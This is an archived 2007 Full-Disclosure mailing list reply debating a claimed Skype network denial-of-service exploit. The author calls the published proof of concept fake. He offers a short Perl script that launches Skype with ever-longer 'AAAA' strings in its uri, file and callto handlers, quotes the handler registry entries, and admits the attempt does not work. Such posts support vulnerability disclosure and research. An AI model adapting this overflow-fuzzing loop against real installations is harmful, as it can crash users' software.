lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri, 17 Aug 2007 13:48:39 +0200
From: ascii <ascii@...amail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Skype Network Remote DoS Exploit

Valery Marchuk wrote:
> Hi all!
> On SecurityLab.ru forum an exploit code was published by an anonymous
> user. Reportedly it must have caused Skype massive disconnections
> today. The PoC uses standard Skype client to call to a specific
> number. This call causes denial of service of current Skype server and
> forces Skype to reconnect to another server. The new server also
> "freezes" and so on ... the entire network.
> Liks: http://www.securitylab.ru/news/301422.php
> PoC: http://en.securitylab.ru/poc/301420.php

imho fake (the poc does nothing except looping forever, missing
execve(), exec() in place of system(), etc)

should be something like

#!/usr/bin/perl

for ($i=0;$i<(256*256);$i=$i+256) {
 // ctrl + q for fast quit from skype
 print "Try with $i\n";
 $eot='AAAA' x $i;
 $str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/uri:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/file:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/callto:$eot\"";
 #$str="\"/home/l/bin/skype_static-latest/skype\" \"/uri:$eot\"";
 #$str="\"/usr/bin/skype\" \"/uri:$eot\"";
 #$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
 #print($str);
 system($str);
}

uri is a legit skype protocol handler

0x2,"Classes\skype\shell\open\command", "", "%SystemDrive%\Program
Files\Skype\Phone\Skype.exe" "/uri:%1"
0x1,"Classes\Skype.Content\Shell\Open\Command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/file:%1"
0x2,"Classes\callto\shell\open\command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/callto:%1"

but still doesn't work

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ